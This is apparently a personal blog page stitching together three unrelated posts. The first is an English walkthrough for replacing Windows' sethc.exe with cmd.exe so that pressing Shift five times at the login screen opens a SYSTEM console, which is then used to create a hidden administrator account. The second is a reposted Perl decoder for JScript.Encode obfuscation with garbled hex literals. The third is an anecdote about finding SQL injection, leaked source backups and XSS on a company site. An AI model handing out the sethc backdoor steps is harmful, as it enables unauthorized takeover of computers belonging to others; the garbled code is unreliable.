猪在笑

get a root account by doing the following.

start->run->system32

back up cmd.exe and sethc.exe

copy cmd.exe to different location and rename it sethc

copy it back to system32 dir and accept replacement of sethc.

now press the shift key 5 times and you will have command up.

remember you will need a normal account to do this when you are done you can now get your own account.

from the welcome screen prees the shift key 5 times

type net user <username> <password> /add

dont exit the the command

now press the ctrl+alt+del 2 times it will take off the welcome screen and bring up a login box.

now type explorer.exe

you have a console with the user name system from her you can do anything.

start->run->mmc

press ctrl+m , add , scroll down and add local user and group local
computer. there should be a plus by it click it and click the user
folder.

in the other window u should find the user name you added rigght
click and properties click the member of tab and then add type
administrators, click on ok and close the mmc dont save prompted to
save.

start logout

type your user name and password and you are there an admin of that computer.

今天做完评估后，针对微软的那个JS.Encode加密JS代码的问题，我特地Google了一下，果然找到了一个Decode的工具，而且是用我最爱的Perl编写的，嘿嘿，特此贴上源代码部分

#!/usr/local/bin/perl -w

my $version=1.0;

sub decode;

my @itable = (0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1,
0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2,
0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2,
0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2);

my @dectab =
(
[0×00,0×01,0×02,0×03,0×04,0×05,0×06,0×07,0×08,0×57,0×0A,0×0B,0×0C,0×0D,0×0E,0×0F,
0×10,0×11,0×12,0×13,0×14,0×15,0×16,0×17,0×18,0×19,0×1A,0×1B,0×1C,0×1D,0×1E,0×1F,
0×2E,0×47,0×7A,0×56,0×42,0×6A,0×2F,0×26,0×49,0×41,0×34,0×32,0×5B,0×76,0×72,0×43,
0×38,0×39,0×70,0×45,0×68,0×71,0×4F,0×09,0×62,0×44,0×23,0×75,0×3C,0×7E,0×3E,0×5E,
0xFF,0×77,0×4A,0×61,0×5D,0×22,0×4B,0×6F,0×4E,0×3B,0×4C,0×50,0×67,0×2A,0×7D,0×74,
0×54,0×2B,0×2D,0×2C,0×30,0×6E,0×6B,0×66,0×35,0×25,0×21,0×64,0×4D,0×52,0×63,0×3F,
0×7B,0×78,0×29,0×28,0×73,0×59,0×33,0×7F,0×6D,0×55,0×53,0×7C,0×3A,0×5F,0×65,0×46,
0×58,0×31,0×69,0×6C,0×5A,0×48,0×27,0×5C,0×3D,0×24,0×79,0×37,0×60,0×51,0×20,0×36],
[0×00,0×01,0×02,0×03,0×04,0×05,0×06,0×07,0×08,0×7B,0×0A,0×0B,0×0C,0×0D,0×0E,0×0F,
0×10,0×11,0×12,0×13,0×14,0×15,0×16,0×17,0×18,0×19,0×1A,0×1B,0×1C,0×1D,0×1E,0×1F,
0×32,0×30,0×21,0×29,0×5B,0×38,0×33,0×3D,0×58,0×3A,0×35,0×65,0×39,0×5C,0×56,0×73,
0×66,0×4E,0×45,0×6B,0×62,0×59,0×78,0×5E,0×7D,0×4A,0×6D,0×71,0×3C,0×60,0×3E,0×53,
0xFF,0×42,0×27,0×48,0×72,0×75,0×31,0×37,0×4D,0×52,0×22,0×54,0×6A,0×47,0×64,0×2D,
0×20,0×7F,0×2E,0×4C,0×5D,0×7E,0×6C,0×6F,0×79,0×74,0×43,0×26,0×76,0×25,0×24,0×2B,
0×28,0×23,0×41,0×34,0×09,0×2A,0×44,0×3F,0×77,0×3B,0×55,0×69,0×61,0×63,0×50,0×67,
0×51,0×49,0×4F,0×46,0×68,0×7C,0×36,0×70,0×6E,0×7A,0×2F,0×5F,0×4B,0×5A,0×2C,0×57],
[0×00,0×01,0×02,0×03,0×04,0×05,0×06,0×07,0×08,0×6E,0×0A,0×0B,0×0C,0×06,0×0E,0×0F,
0×10,0×11,0×12,0×13,0×14,0×15,0×16,0×17,0×18,0×19,0×1A,0×1B,0×1C,0×1D,0×1E,0×1F,
0×2D,0×75,0×52,0×60,0×71,0×5E,0×49,0×5C,0×62,0×7D,0×29,0×36,0×20,0×7C,0×7A,0×7F,
0×6B,0×63,0×33,0×2B,0×68,0×51,0×66,0×76,0×31,0×64,0×54,0×43,0×3C,0×3A,0×3E,0×7E,
0xFF,0×45,0×2C,0×2A,0×74,0×27,0×37,0×44,0×79,0×59,0×2F,0×6F,0×26,0×72,0×6A,0×39,
0×7B,0×3F,0×38,0×77,0×67,0×53,0×47,0×34,0×78,0×5D,0×30,0×23,0×5A,0×5B,0×6C,0×48,
0×55,0×70,0×69,0×2E,0×4C,0×21,0×24,0×4E,0×50,0×09,0×56,0×73,0×35,0×61,0×4B,0×58,
0×3B,0×57,0×22,0×6D,0×4D,0×25,0×28,0×46,0×4A,0×32,0×41,0×3D,0×5F,0×4F,0×42,0×65]);

if (scalar(@ARGV) < 2)
{
print “\nJScript.decode.pl $version\n(c) Christophe Grosjean 01/2004\nUsage: JScript.decode.pl infile.htm outfile.htm\n“;
exit;
}

open(IN,“<$ARGV[0]“) || die “Can’t open input file\n“;
open(OUT,“>$ARGV[1]“) || die “Can’t open output file\n“;

my $before;
my $coded;
my $after;

while (<IN>){
($before,$coded,$after)= ($_ =~ /^(.*)\#@~\^(.*)\^\#~@(.*)$/);
if (defined($coded)){
print OUT $before;
decode($coded);
print OUT $after;
$coded = undef;
}
else{
print OUT $_;
}
}
exit;

sub decode {
my $coded = shift;
my $decoded;
my $pos = 0;
my $i = 8;
while ($i<length($coded)){
my $res = ord(substr($coded,$i++,1));
if ($res < 0×80){
$res = ${$dectab[$itable[$pos]]}[$res];
# following char is marked as a special char
if ($res == 0xFF){
$res = ord(substr($coded,$i++,1));
if ($res == 0×26) {$res = 0×0A;}
elsif ($res == 0×23){$res = 0×0D;}
elsif ($res == 0×2A){$res = 0×3E;}
elsif ($res == 0×26){$res = 0×0A;}
elsif ($res == 0×21){$res = 0×3C;}
elsif ($res == 0×24){$res = 0×40;}
}
}
$pos = ($pos+1)&0×3F;
if ($res != 255){
$decoded.=chr($res);
}
}
print OUT $decoded;
}

PS:本人是非常的痛恨网站的这种bs Firefox的行为，为什么就不能做到W3C compatible呢？

中午吃完饭回来接到老板任务，说下午要去一个单位做安全评估的交流，给了我那个单位的网站地址，让我先看看有什么安全问题
正晕着呢，时间还很紧，但也得硬着头皮应了好～
毕竟没有拿到人家的授权，不能用扫描器进行扫描，只能被动分析。不怕，我有Firefox哈~
开始浏览站点
令人郁闷的是这个站点居然是Firefox不友好的，页面的JS文件居然用了微软的混淆器，搞了个JS.Encode，ft！
没辙，上IE
架上代理，设置IE代理，开始干活。
此处省略1024字。。。
半小时过去了，发现了一些有趣的安全问题
1. 作为新闻类网站，所有的新闻URL居然没有做任何的SQL注入过滤，汗
2. 网站发布时居然没有删除开发过程中编辑源代码产生的备份文件，其直接结果就是我可以远程查看它的服务器端脚本源代码，再次汗
3. 留言板居然可以直接写js，汗死
有了这些发现，下午的交流自然进行的比较顺利，也算不辱使命了吧o(∩_∩)o